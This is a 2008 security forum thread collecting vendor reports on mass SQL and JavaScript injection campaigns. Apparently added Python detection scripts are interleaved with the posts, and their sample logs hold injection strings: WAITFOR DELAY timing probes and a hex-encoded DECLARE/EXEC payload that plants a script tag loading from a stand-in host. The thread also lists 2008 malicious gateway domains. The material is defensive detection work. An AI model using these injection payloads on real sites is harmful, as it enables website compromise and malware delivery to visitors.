CastleCops, Internet Crime Fighters
Malware - Hundreds of thousands of SQL injections
AplusWebMaster

PostPosted: Sat Jul 19, 2008 11:25 am    Post subject:

FYI...

- http://preview.tinyurl.com/6mgej5
July 16, 2008 - "...According to the latest ScanSafe Global Threat Report:
1. Malware Increases 278 Percent: Web-based malware increased 278 percent as more and more legitimate sites including Wal-Mart, Business Week, Ralph Lauren Home and Race for Life were compromised. This widespread compromise of legitimate websites was largely the result of automated attack tools which became freely available in the last months of 2007.
2. SQL Injection Attacks Outpace Other Attacks by 212 Percent: SQL injection attacks, an exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data, have rapidly become the most common form of website compromise, outpacing all other types of compromise by 212 percent. In June, SQL injection attacks accounted for 76 percent of all compromised sites.
3. Password Stealers and Backdoor Trojans Most Commonly Blocked Malware—Putting Corporate Data at Risk: Most of the compromises attempt to install password stealers and backdoor Trojans. This category of malware increased from 4 percent of malware in January to 27 percent in June.

The ScanSafe Global Threat Report is a study of the more than 60 billion Web requests it scanned and 600 million Web threats it blocked from January through June 2008 on behalf of corporate customers in more than 60 countries across five continents. It represents the world’s largest security analysis of real-world corporate Web traffic. A full copy of the report is available at http://www.scansafe.com/resources/global_threat_reports2/ ."

//


_________________
AplusWebMaster
~ Are you up to date or vulnerable to Hackers? ...or both?
AplusWebMaster

PostPosted: Mon Jul 21, 2008 4:11 pm    Post subject: SQL Injection List - format update

FYI...

SQL Injection List - Format Update
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 can be fetched in text form at
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."

//


AplusWebMaster

PostPosted: Thu Jul 24, 2008 11:12 am    Post subject: Cold Fusion app/servers attacked...

FYI...

- http://isc.sans.org/diary.html?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in a couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."



AplusWebMaster

PostPosted: Sat Aug 09, 2008 7:24 am    Post subject: More SQL Injections ...

FYI...

More SQL Injections ...
- http://isc.sans.org/diary.html?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
Next:
A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These files contain some JavaScript... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT (Virustotal) detect the file as malicious and for FF 10/36 detect the file as being malicious.
yahoo.htm
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Office.htm
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
ksx.htm
Attempts to get the browser to include the rondll32.exe file. Detection for rondll32.exe is good with most AV products catching this one.
06014.htm
was unavailable at the time I checked.

...The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."

//


AplusWebMaster

PostPosted: Sat Aug 23, 2008 1:10 am    Post subject: Sunkist site - mass JavaScript injection

FYI...

Sunkist site - mass JavaScript injection
- http://securitylabs.websense.com/content/Alerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)



AplusWebMaster

PostPosted: Fri Aug 29, 2008 12:03 pm    Post subject: SQL injection attacks - increases related to Asprox botnet..

FYI...

- http://www.darkreading.com/document.asp?doc_id=162515&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe.com/__data/assets/pdf_file/8696/July_2008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims' computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."



AplusWebMaster

PostPosted: Tue Sep 16, 2008 1:02 pm    Post subject:

FYI...

SQL injection ...BusinessWeek.com
- http://www.sophos.com/pressoffice/news/articles/2008/09/businessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek’s website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)



AplusWebMaster

PostPosted: Thu Sep 18, 2008 9:55 am    Post subject: SQL threat: Trojan.Eskiuel...

FYI...

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally and remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-091215-0809-99

(Screenshots and more detail available at both URL links above.)



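The Symantec write-up above describes a threat that needs no exploit at all: a burst of failed "sa" logins followed by one success. That pattern is visible in the SQL Server errorlog when login auditing records both failed and successful logins, and the script below (an added example, not Symantec's or the poster's code) flags it with a per-client sliding window. The log lines are constructed for the example in the style of the errorlog; the addresses are documentation ranges, not real attacker hosts, and the window and threshold are assumed tuning values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the style of the SQL Server errorlog, with login
# auditing set to record both failed and successful logins. Invented for
# this example: a short "sa" brute-force burst that ends in a success, and
# an ordinary user mistyping a password twice, hours apart.
SAMPLE_ERRORLOG = """\
2008-09-17 03:14:01.10 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-09-17 03:14:01.42 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-09-17 03:14:01.77 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-09-17 03:14:02.05 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-09-17 03:14:02.31 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-09-17 03:14:02.60 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.7]
2008-09-17 08:02:11.00 Logon       Login failed for user 'app_user'. [CLIENT: 10.0.0.5]
2008-09-17 09:30:45.00 Logon       Login failed for user 'app_user'. [CLIENT: 10.0.0.5]
2008-09-17 09:31:02.00 Logon       Login succeeded for user 'app_user'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.5]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_errorlog(text):
    """Return (timestamp, result, user, client) tuples for every logon line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["result"], m["user"], m["client"]))
    return events


def detect_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Sliding window per (client, user) pair.

    `threshold` failures inside `window` is reported once as a brute-force
    burst; a success from the same pair while a burst is open is reported as
    a likely compromise (the weak password was found). Any success resets
    the pair's window.
    """
    recent = defaultdict(deque)   # (client, user) -> timestamps of recent failures
    bursting = set()              # pairs already reported as brute-forcing
    alerts = []
    for ts, result, user, client in events:
        key = (client, user)
        q = recent[key]
        if result == "failed":
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in bursting:
                bursting.add(key)
                alerts.append(("bruteforce", client, user, len(q)))
        else:
            if key in bursting:
                alerts.append(("compromise", client, user, len(q)))
                bursting.discard(key)
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_errorlog(SAMPLE_ERRORLOG)):
        print(alert)
```

A "compromise" alert on "sa" is the one to act on first: the account has full rights and, as the write-up notes, the stored procedures are what the Trojan uses next. Auditing only failed logins (the default) still gives you the "bruteforce" alert, but not the confirmation that the guess succeeded.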
AplusWebMaster

PostPosted: Mon Sep 29, 2008 12:01 pm    Post subject: Ongoing SQL injections...

FYI...

ASPROX mutant
- http://isc.sans.org/diary.html?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/diary.html?storyid=4565

** http://www.virustotal.com/en/analisis/5584aa5aed6d2338141d7ae62c126fff



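Two of the ISC diaries quoted in this thread describe what the attackers leave in a web server's logs: the July 24 post says the bot tests a page by injecting a condition that delays the reply and then timing the response, and the post above says the ASPROX-style injection (starting with DECLARE...) now arrives in a cookie as well as in the URL. The script below, an added example and not code from the ISC diaries or the poster, runs both checks over log lines. Assumptions not stated on the page: the log layout (client, method, URL, quoted Cookie header, status, time-taken in ms) is constructed for the example; the delay primitive is taken to be WAITFOR DELAY, with MySQL and PostgreSQL equivalents included; and the DECLARE... injection is assumed to have the common DECLARE/SET ... CAST(0x... AS VARCHAR)/EXEC shape, which the diary does not quote. The hex payload is built inline from a placeholder SQL statement, so no real attacker host appears.

```python
import re
import urllib.parse
from collections import namedtuple

LogEntry = namedtuple("LogEntry", "client method url cookie status time_taken_ms")

# Assumed log layout, constructed for this example:
#   client_ip method url "cookie-header" status time_taken_ms
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\d+)$')

# Delay primitives used for time-based probing (WAITFOR DELAY is assumed
# for the MSSQL case; SLEEP/BENCHMARK and pg_sleep are the MySQL/Postgres forms).
TIME_PROBE_RE = re.compile(
    r"waitfor\s+delay|\bsleep\s*\(|benchmark\s*\(|pg_sleep\s*\(", re.I)

# Assumed shape of the hex-encoded injection:
#   DECLARE @S [N]VARCHAR(n);SET @S=CAST(0x... AS [N]VARCHAR(n));EXEC(@S);--
HEX_CAST_RE = re.compile(
    r"declare\s+@\w+\s+(n?varchar)\s*\(\s*\d+\s*\)\s*;?\s*set\s+@\w+\s*=\s*"
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.I)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, url, cookie, status, tt = m.groups()
    return LogEntry(ip, method, url, cookie, int(status), int(tt))


def decode_hex_cast(text):
    """Recover the SQL hidden in a CAST(0x... AS [N]VARCHAR) expression, or None."""
    m = HEX_CAST_RE.search(text)
    if not m:
        return None
    declared_type, hexstr = m.groups()
    if len(hexstr) % 2:
        return None
    raw = bytes.fromhex(hexstr)
    if declared_type.lower() == "nvarchar":       # NVARCHAR is UTF-16LE on the wire
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyze(lines, delay_threshold_ms=5000):
    """Return (client, location, kind, detail) findings for probes and injections.

    Both the query string and the Cookie header are URL-decoded and checked,
    since the injection can sit in either. A time-probe whose response took
    longer than `delay_threshold_ms` is marked "delayed": the injected SQL ran.
    """
    findings = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        fields = {"url": urllib.parse.unquote_plus(e.url),
                  "cookie": urllib.parse.unquote_plus(e.cookie)}
        for where, text in fields.items():
            if TIME_PROBE_RE.search(text):
                verdict = "delayed" if e.time_taken_ms >= delay_threshold_ms else "not delayed"
                findings.append((e.client, where, "time-probe", verdict))
            payload = decode_hex_cast(text)
            if payload is not None:
                findings.append((e.client, where, "hex-cast", payload))
    return findings


# Constructed sample traffic. The injected statement is a placeholder that
# points at a reserved example domain, hex-encoded here so the log lines look
# like the real thing without embedding a real malicious host.
INJECTED_SQL = "UPDATE products SET descr = descr + '<script src=\"http://malicious.example/x.js\"></script>'"
_HEX_A = INJECTED_SQL.encode("latin-1").hex()       # VARCHAR payload
_HEX_N = INJECTED_SQL.encode("utf-16-le").hex()     # NVARCHAR payload

SAMPLE_LOG = [
    '203.0.113.7 GET /catalog.cfm?id=12 "session=abc" 200 240',
    '203.0.113.7 GET /catalog.cfm?id=12;waitfor%20delay%20%270:0:20%27-- "session=abc" 200 20310',
    '203.0.113.7 GET /news.cfm?id=3;waitfor%20delay%20%270:0:20%27-- "session=abc" 500 230',
    f'198.51.100.9 GET /page.asp?id=5;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x{_HEX_A}%20AS%20VARCHAR(4000));EXEC(@S);-- "s=1" 200 300',
    f'198.51.100.9 GET /page.asp?id=5 "s=1;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x{_HEX_N} AS NVARCHAR(4000));EXEC(@S);--" 200 290',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The response-time check is only meaningful together with the probe pattern: a slow page alone proves nothing, but a request carrying WAITFOR DELAY that took about as long as the delay it asked for is a script that ran attacker-supplied SQL, and that page should be fixed before the follow-up injection arrives. Decoding the hex payload tells you which table and column were targeted and which host the injected script tag points at, which is what you need to clean the database and block the host.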
AplusWebMaster

PostPosted: Sun Oct 19, 2008 12:45 pm    Post subject: Adobe site - SQL injected...

FYI...

Adobe site - SQL injected...
- http://www.sophos.com/security/blog/2008/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact that it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregister.co.uk/2008/10/16/hijacked_abobe_page/

(Screenshot available at both URLs above.)



AplusWebMaster

PostPosted: Wed Nov 05, 2008 12:20 am    Post subject:

FYI...

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs.websense.com/content/Alerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)



AplusWebMaster

PostPosted: Sat Nov 08, 2008 9:39 pm    Post subject:

FYI...

- http://www.viruslist.com/en/weblog?weblogid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to Java Script located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."



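The Kaspersky post above gives the one thing a site admin can check directly: the injected tag is <script src=http://******/h.js> and the six gateway hosts are listed. The script below, an added example rather than Kaspersky's, Websense's or the poster's code, pulls every script src out of a page and reports the ones whose host is on that list (or a subdomain of one), which is the same check the Sunkist and ECPAT posts call for with their nine and twenty payload hosts: the blocklist is a parameter. The page content is constructed for the example. The domain list is a 2008 indicator set; domains change hands, so treat it as historical rather than as a current blocklist.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Gateway hosts named in the Kaspersky post (2008 indicators, kept as given).
GATEWAYS = {"armsart.com", "acglgoa.com", "idea21.org", "yrwap.cn", "s4d.in", "dbios.org"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or not.

    html.parser tolerates the unquoted form (src=http://host/h.js) that the
    injected tag uses, which a naive regex for src="..." would miss.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def host_of(src):
    """Hostname of a script URL; '' for relative paths. Handles //host/ forms too."""
    if src.startswith("//"):
        src = "http:" + src
    return (urlsplit(src).hostname or "").lower()


def matches_blocklist(host, blocklist=GATEWAYS):
    # Exact match or any subdomain of a listed host.
    return any(host == b or host.endswith("." + b) for b in blocklist)


def find_injected_scripts(html, blocklist=GATEWAYS):
    """Return (src, host) for every external script served from a listed host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    return [(src, host_of(src)) for src in collector.srcs
            if matches_blocklist(host_of(src), blocklist)]


# Constructed page: one legitimate local script, one legitimate third-party
# script, and two injected tags (one unquoted, one protocol-relative).
SAMPLE_PAGE = """<html><head><title>Products</title>
<script src="/js/site.js"></script>
<script src=http://armsart.com/h.js></script>
</head><body>
<p>Welcome</p>
<script type="text/javascript" src="//cdn.s4d.in/h.js"></script>
<script src="https://www.example.org/analytics.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, host in find_injected_scripts(SAMPLE_PAGE):
        print(f"injected script from {host}: {src}")
```

Run this over rendered pages rather than templates: with the SQL-injected sites in this thread the tag lives in database rows, so it only shows up in the HTML the server actually emits. A hit means the database (or the stolen account the post mentions as the other likely vector) still needs cleaning, not just the one page.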